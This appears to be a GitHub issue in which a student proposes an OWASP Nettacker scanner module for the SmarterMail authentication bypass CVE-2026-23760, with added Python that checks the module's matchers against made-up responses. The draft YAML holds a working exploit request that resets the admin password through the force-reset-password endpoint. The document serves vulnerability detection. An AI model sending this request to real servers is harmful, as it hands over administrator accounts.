Description
Hello @samstepanyan, @Ali-Razmjoo, and @arkadiyt!
My name is Cavin, a 3rd-year student at Politeknik Siber dan Sandi Negara. I am highly interested in contributing to OWASP Nettacker for GSoC 2026, specifically focusing on the "Implement more modules (CISA KEV CVEs)" project idea. Since the Slack invite link is currently inactive, I wanted to reach out and propose my first contribution here.
As a proof-of-concept for my GSoC proposal, I would like to create a module for a recent critical CISA KEV: CVE-2026-23760 (SmarterTools SmarterMail Authentication Bypass, CVSS 9.3).
This vulnerability allows unauthenticated attackers to reset the system administrator password via the /api/v1/auth/force-reset-password endpoint.
Here is the initial draft of the declarative YAML logic I plan to implement:
```yaml
info:
  name: SmarterMail Auth Bypass (CVE-2026-23760)
  author: Cavin Agustinus Sitorus
  severity: critical
  description: Authentication bypass vulnerability in SmarterMail's password reset API.
  reference:
    - https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

requests:
  - method: POST
    path: "/api/v1/auth/force-reset-password"
    headers:
      Content-Type: "application/json"
    body: '{"IsSysAdmin":"true","OldPassword":"watever","Username":"admin","NewPassword":"NewPassword123!@#","ConfirmPassword":"NewPassword123!@#"}'
    matchers:
      - type: word
        words:
          - '"success":true'
          - '"resultCode":200'
        condition: and
      - type: status
        status:
          - 200
```
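As an added illustration of how the declarative matcher block in the draft is meant to decide a result (this is example code written for this page, not Nettacker's engine and not part of the issue above), the Python below evaluates the `word` matcher with `condition: and` together with the `status` matcher against constructed HTTP responses. It assumes the usual semantics that every matcher in the list must pass; the response bodies are made up for the test and were not captured from any host.

```python
"""Evaluate a module's declarative matchers against an HTTP response.

Added example, not OWASP Nettacker's own code. MODULE_MATCHERS mirrors the
matcher block of the draft YAML in the issue; the responses are constructed.
"""

# Matcher block copied from the draft module (same words, condition and status).
MODULE_MATCHERS = [
    {"type": "word", "words": ['"success":true', '"resultCode":200'], "condition": "and"},
    {"type": "status", "status": [200]},
]


def _match_word(matcher, body):
    """A word matcher passes when its words appear in the body.
    'condition: and' (assumed default) needs all of them, 'or' needs any one."""
    hits = [word in body for word in matcher["words"]]
    if matcher.get("condition", "and") == "or":
        return any(hits)
    return all(hits)


def _match_status(matcher, status):
    """A status matcher passes when the response code is in the listed codes."""
    return status in matcher["status"]


def evaluate_matchers(matchers, status, body):
    """Return True only when every matcher passes (assumption: the matchers in
    a request block are AND-ed together, which is what the draft relies on)."""
    for matcher in matchers:
        kind = matcher["type"]
        if kind == "word":
            ok = _match_word(matcher, body)
        elif kind == "status":
            ok = _match_status(matcher, status)
        else:
            raise ValueError(f"unsupported matcher type: {kind}")
        if not ok:
            return False
    return True


# Constructed sample responses (status, body); not real server output.
SAMPLE_RESPONSES = {
    "affected":  (200, '{"resultCode":200,"success":true,"message":""}'),
    "rejected":  (401, '{"resultCode":401,"success":false,"message":"Unauthorized"}'),
    "noisy_200": (200, '{"resultCode":200,"success":false,"message":"Invalid old password"}'),
}


def classify(name):
    """Run the module's matchers over one named sample response."""
    status, body = SAMPLE_RESPONSES[name]
    return evaluate_matchers(MODULE_MATCHERS, status, body)


if __name__ == "__main__":
    for name in SAMPLE_RESPONSES:
        print(f"{name}: {'matched' if classify(name) else 'no match'}")
```

The `noisy_200` case is the one worth keeping in mind when writing the module: a status matcher alone would flag any HTTP 200, so pairing it with the `"success":true` word under `condition: and` is what keeps a rejected reset that still returns 200 from being reported as a finding.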